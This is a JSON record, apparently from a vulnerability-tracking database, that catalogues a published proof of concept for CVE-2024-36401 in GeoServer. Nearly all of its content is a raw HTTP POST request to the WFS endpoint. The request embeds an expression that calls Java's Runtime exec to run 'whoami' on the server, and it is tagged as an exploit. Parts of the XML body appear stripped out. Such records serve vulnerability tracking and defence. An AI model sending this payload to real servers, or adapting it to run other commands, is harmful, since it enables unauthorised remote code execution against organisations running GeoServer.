{"uuid": "52b737d2-8512-45b3-9881-9eac6525f2bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36401", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2764", "content": "cve-2024-36401\n\nPOST /geoserver/wfs HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nContent-Type: application/xml\nConnection: close\n\n\n  \n  exec(java.lang.Runtime.getRuntime(),'whoami')\n\n\nwhoami\n\n#exploit  #poc", "creation_timestamp": "2024-07-08T13:47:04.000000Z"}